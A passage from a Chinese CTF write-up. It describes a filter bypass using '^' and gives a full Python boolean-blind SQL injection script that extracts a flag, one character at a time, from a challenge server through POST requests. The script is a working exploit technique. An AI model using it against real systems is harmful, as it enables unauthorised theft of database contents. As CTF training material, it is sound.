,or,&&,||,#,--+,",' '等都过滤了,但^没过滤,先手工尝试,成功测出数据库长度为11,可行。
接着用布尔盲注的脚本爆破,因为是post传参,要改一下写法:
import requests
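def check_res(res):
    """Return True when the response body signals a "true" oracle answer.

    The script uses the page as a boolean oracle: a body containing the
    substring "girlfriend" is taken as the "true" outcome of the injected
    condition, and any other body (including a login-failure page) as
    "false".  The membership test already yields a bool, so no if/else
    ladder is needed.

    Args:
        res: a response object exposing a ``.text`` string (a
            ``requests.Response`` in the script's own usage).

    Returns:
        bool: True if the marker substring is present, False otherwise.
    """
    return "girlfriend" in res.text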
def res_length(exp):
    """Return the length of the value that *exp* evaluates to.

    Each POST sends the condition ``length((exp))>N`` through the ``id``
    parameter, prefixed with ``0^(`` so that it closes the parameter in the
    guessed server-side statement.  *N* starts at 0 and is incremented for
    as long as check_res() reports a "true" page; the first *N* that is no
    longer exceeded is the length.

    Args:
        exp: the SQL expression whose result length is to be measured.

    Returns:
        int: the measured length (0 if the very first probe is "false").

    Note:
        The loop has no upper bound; it only terminates when the oracle
        eventually answers "false".
    """
    probe_url = "http://node2.anna.nssctf.cn:28081/index.php"
    client = requests.session()
    guess = 0
    while True:
        condition = "length(({}))>{:d}".format(exp, guess)
        reply = client.post(probe_url, data={"id": "0^({})".format(condition)})
        if not check_res(reply):
            return guess
        guess += 1
def res_result(exp, length):
    """Recover the *length*-character value of *exp* one character at a time.

    For every position a binary search over the code range 0..1270 is driven
    by the oracle condition ``ascii(substr((exp),pos,1))>mid``.  A "true"
    answer raises the lower bound to *mid*, a "false" answer lowers the
    upper bound to *mid*; when the interval can no longer shrink
    (``mid == low``) the upper bound is the character code.

    Args:
        exp: the SQL expression whose value is to be read.
        length: number of characters to recover (see res_length()).

    Returns:
        str: the recovered characters, in order; "" when *length* is 0.
    """
    probe_url = "http://node2.anna.nssctf.cn:28081/index.php"
    client = requests.session()
    recovered = []
    for pos in range(1, length + 1):
        low, high = 0, 1270
        while True:
            mid = (low + high) // 2
            if mid == low:
                # Interval collapsed: the code is the current upper bound.
                recovered.append(chr(high))
                break
            condition = "ascii(substr(({}),{:d},1))>{:d}".format(exp, pos, mid)
            # "0^(" closes the id parameter in the guessed server-side statement.
            reply = client.post(probe_url, data={"id": "0^({})".format(condition)})
            if check_res(reply):
                low = mid
            else:
                high = mid
    return "".join(recovered)
if __name__ == '__main__':
    # Interactive driver: read one SQL expression per prompt, measure the
    # length of its value, then recover and print the value itself.
    # Runs until the process is interrupted.
    while True:
        expression = input(">>>请输入SQL语句:")
        size = res_length(expression)
        print("[+]length :{:d}".format(size))
        value = res_result(expression, size)
        print("[+]result:{}".format(value))
exp:select(flag)from(flag)
因为length的返回值应该是无符号型的,所以和-1等负数比较会出错。一开始测长度时的初始值设成了-1,结果一直找不到错在哪。